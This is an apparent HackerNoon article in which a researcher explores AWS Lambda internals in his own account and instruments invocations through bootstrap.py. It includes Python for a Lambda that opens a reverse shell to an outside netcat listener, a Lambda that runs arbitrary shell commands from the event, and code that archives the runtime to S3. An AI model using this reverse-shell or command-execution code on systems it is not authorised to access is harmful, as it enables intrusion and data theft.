Lambda Internals: Exploring AWS Lambda

Written by galbashan1 | Published 2018/04/15
Tech Story Tags: aws-lambda | software-engineering | software-architecture | python | research


Diving deep down. Photo by Talia Cohen

This article is the first part of a two-piece series. The next part is right here!

AWS Lambda is an excellent environment for rapid and scalable development. As a developer, I love using it. The main advantage of Lambda is that you can focus solely on your code. No more thinking about web servers, machines, scalability and other issues you REALLY don’t care about. Upload your code, say the magic words (aka serverless invoke) and your code is executed. However, just because you CAN ignore those things doesn’t mean you have to, right?

I believe that knowing your environment can be a handy tool, and it can also be fun, so I decided to explore the Lambda environment. There are a few stories that review the specs of the Lambda environment but my ultimate goal was to analyze not just the container of the Lambda but also the code of Lambda itself. I wanted to fully understand the code in charge of executing my code.

Focus sometimes means blurring out the rest. Is that really what we want? Image: Paul Skorupska

Despite my years as a security researcher, I decided to approach this problem with a developer mindset. Why? I want to know Lambda better in order to use it more effectively and have some fun along the way.

Getting Started

To begin my research, I first had to gain access to Lambda’s container. Also, I had to find the code that is executing my Lambda. If you don’t care about that and want to skip ahead to what I found out, you can jump to Lambda Internals.

Getting a Shell

I found that the easiest way to get a shell to the Lambda container is by using a Lambda that opens a reverse shell to a server. And what is the easiest way to get a server with a public IP for the Lambda to connect? Deploying an EC2 with an elastic IP, of course! Thank you, Amazon.

Here is the Lambda’s code:
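A minimal sketch of what such a reverse-shell Lambda can look like is shown here. It assumes the event carries the listener address under the keys ip and port (these key names, and the helper parse_target, are illustrative choices rather than anything Lambda requires), and that /bin/sh exists in the container.

```python
import socket
import subprocess


def parse_target(event):
    """Return (host, port) from the event; 'ip' and 'port' are assumed key names."""
    return event["ip"], int(event["port"])


def handler(event, context):
    host, port = parse_target(event)
    # Connect back to the listener (for example, netcat on the EC2 instance).
    sock = socket.create_connection((host, port))
    try:
        fd = sock.fileno()
        # Run an interactive shell with stdin, stdout and stderr wired to the socket.
        shell = subprocess.Popen(["/bin/sh", "-i"], stdin=fd, stdout=fd, stderr=fd)
        # Block until the shell exits (or the Lambda hits its timeout).
        shell.wait()
    finally:
        sock.close()
    return "shell closed"
```

With this sketch, the event would simply be a JSON object holding those two keys. The Lambda timeout bounds how long the shell stays open, so a generous timeout is useful while exploring.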

I then set up a listening server on my EC2 using netcat: nc -l 1234

Finally, I created an event containing my IP and port (called event.json) and triggered my Lambda using the Serverless Framework:

cat event.json | serverless invoke -f shell

and as expected — we are in!

Simple Lambda shell

Downloading the Runtime

OK, getting a shell was easy. After all, Lambda lets us do pretty much whatever we want, including executing bash commands from within the Lambda. Next, I wanted to find where the code that executes my code lives, download it and start assessing it.

The first thing I did was run the ps command to check which processes are running:

Process running on a Lambda container
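The same listing can also be obtained without an interactive shell, since a Lambda can run commands directly. The following is a small sketch of that idea, assuming an event key named cmd (an illustrative name) that defaults to ps aux:

```python
import subprocess


def handler(event, context):
    # 'cmd' is an assumed event key; it defaults to listing all processes.
    cmd = event.get("cmd", "ps aux")
    # shell=True lets the event carry an ordinary shell command line.
    result = subprocess.run(
        cmd,
        shell=True,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        universal_newlines=True,
    )
    # The combined stdout/stderr text is returned as the invocation result.
    return result.stdout
```

Invoking it with a different cmd value, such as a directory listing of /var/runtime, gives a quick way to poke around one command at a time.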

In the ps output we can see that the only process the user we are running as has access to (besides the shell and ps that we invoked from within the Lambda) is a Python script residing in /var/runtime/awslambda. That is probably the script that is executing our code! So the next thing I did was check the content of that directory:

The content of the /var/runtime and the /var/runtime/awslambda directories

The directory content looks very promising, so let’s download it! If your background is security research like mine, you might consider printing the files in hex / base64 / uploading them to an FTP server in order to get them. But wait a minute — we are running on AWS here! There is a much, much simpler way.

Since we have boto3 (or aws-sdk if you are running Node.js) built into Lambda, the easiest way to get the code is to upload it to an S3 bucket! Here is the Lambda I used to download all the code of the Lambda’s runtime environment:
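A minimal sketch of such a Lambda follows. It assumes the event names the target bucket under a bucket key, that the Lambda's role is allowed to write to that bucket, and that the archive is staged in /tmp; the helper make_tarball and the object key runtime.tar.gz are illustrative names.

```python
import os
import tarfile


def make_tarball(src_dir, tar_path):
    """Pack src_dir into a gzip-compressed tar archive and return its path."""
    with tarfile.open(tar_path, "w:gz") as tar:
        tar.add(src_dir, arcname=os.path.basename(src_dir.rstrip("/")))
    return tar_path


def handler(event, context):
    # boto3 ships with the Lambda Python runtime; it is imported here so the
    # archive helper above can be used on machines without it.
    import boto3

    # /tmp is the writable directory inside the Lambda container.
    tar_path = make_tarball("/var/runtime", "/tmp/runtime.tar.gz")
    # 'bucket' is an assumed event key naming an S3 bucket the role can write to.
    boto3.client("s3").upload_file(tar_path, event["bucket"], "runtime.tar.gz")
    return "uploaded"
```

Packing everything into a single archive keeps the upload to one S3 call and preserves the directory layout for later inspection.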

And after creating an event containing the bucket name and executing the Lambda, this is what we get:

AWS S3 interface. We can see the tar we uploaded from the Lambda

So now we have the Lambda’s runtime code. Let’s see what we can learn from it.

Lambda Internals

From a quick look at the code and binaries we downloaded, we can already get a pretty good understanding of the system. Three main components manage the Lambda’s execution:

  1. awslambda/bootstrap.py — a Python wrapper which controls the Lambda invocation. It waits for a first trigger to initialize the Lambda, and then initializes and invokes it. After that, it enters a loop of waiting for an event and invoking the Lambda (and initializing the module again if required).
  2. awslambda/runtime.so — a Python-compatible shared object which bootstrap.py imports. It acts as a Pythonic interface to the other shared object containing the Lambda runtime management core.
  3. liblambda*.so — four libraries in charge of IO, IPC, logging and the runtime of the Lambda. The most interesting one is liblambdaruntime.so, which is in charge of all the heavy lifting of managing the Lambda: receiving trigger events, sending events to the slicer (the component in charge of allocating CPU time for our Lambdas) on Lambda execution start / stop, parsing X-Ray’s trace id and much more.
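To make the control flow described for bootstrap.py more concrete, here is a toy model of it. This is not the actual bootstrap.py code: run_loop and its parameters are hypothetical names, and an in-memory queue stands in for the native runtime that delivers events.

```python
import importlib
from collections import deque


def run_loop(events, module_name, handler_name):
    """Toy model: initialize on the first event, then invoke once per event."""
    handler = None
    results = []
    while events:
        # Stand-in for blocking on the native runtime until an event arrives.
        event = events.popleft()
        if handler is None:
            # Initialization: import the user's module and look up its handler.
            module = importlib.import_module(module_name)
            handler = getattr(module, handler_name)
        # Invocation: call the handler with the event (no real context object here).
        results.append(handler(event, None))
    return results
```

The point of the sketch is only the shape of the loop: the user's module is imported lazily on the first trigger, and the same handler object is reused for the invocations that follow.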

Now that we have an overview of the system, let’s start playing with the components we discovered! In this article, I will dive into an example of adapting bootstrap.py to our needs.

Instrumenting bootstrap.py

Imagine you would like to have a monitoring system that collects all your Lambdas and displays them in a centralized location. It could be that you want to print additional messages in a given format to CloudWatch Logs in all of your invocations, or that all of your Lambdas download a shared resource from S3 at the beginning of each invocation. These are just a few cases where you have to add code at the beginning of each of your Lambdas by using a function call or decorator.

But what if there is another way? Here at Epsagon, where we develop a monitoring utility tailor-made for the serverless architecture, we wanted to find out if there was a better way to instrument every Lambda invocation. Our goal was to achieve 100% invocation coverage while causing minimal changes to the existing code of the instrumented Lambda.

While reviewing bootstrap.py, I found that there are two functions which in turn invoke my Lambda: handle_event_request and handle_http_request. I chose to focus on handle_event_request, but you can apply the same principle to handle_http_request. I created a Python module called instrumenter.py. On import, this module instruments every Lambda invocation to print a log at the beginning (this, of course, can be changed to act as required).
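A minimal sketch of such a module is shown here. It assumes that bootstrap.py runs as the main script, so that its functions are reachable through the __main__ module; the helper name instrument and the log message are illustrative.

```python
import functools
import sys


def instrument(module, name, message="instrumented invocation"):
    """Replace module.<name> with a wrapper that logs before delegating."""
    original = getattr(module, name)

    @functools.wraps(original)
    def wrapper(*args, **kwargs):
        print(message)  # stdout of a Lambda ends up in CloudWatch Logs
        return original(*args, **kwargs)

    setattr(module, name, wrapper)
    return wrapper


# Assumption: bootstrap.py is the main script, so it is visible as __main__.
_bootstrap = sys.modules.get("__main__")
if hasattr(_bootstrap, "handle_event_request"):
    # Patch on import, so a single import line is enough to hook invocations.
    instrument(_bootstrap, "handle_event_request")
```

Because the patch replaces the attribute on the module object, any later call that looks the function up by name in that module goes through the wrapper. Outside a runtime that exposes handle_event_request this way, importing the module is a no-op.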

This is the most straightforward wrapper possible (better argument handling should be used, for example) but for the purpose of this research, it was enough. The next thing I did was define a simple Lambda that imports this library:

And it worked!

Our wrapper instrumented the Lambda invocation and added the log

This new method allows libraries to trace and act on Lambda invocations with very little change to their code: a single import line! This can be really useful for us at Epsagon, and hopefully to many others as well.

Conclusion

Exploring Lambda internals was both fun and productive. We managed to execute commands on Lambda’s container, download Lambda’s runtime environment and even instrument any Lambda invocation! I will keep on exploring Lambda’s environment; next up is digging deeper into the binary libraries. Let me know if there are any more serverless topics you would like to read about, and stay tuned!

Here is the link to an open source project containing all the code I used during my explorations. For most of the examples throughout the article I used Python, but the project contains some matching Node.js utilities as well. If you find it useful, let me know!


Published by HackerNoon on 2018/04/15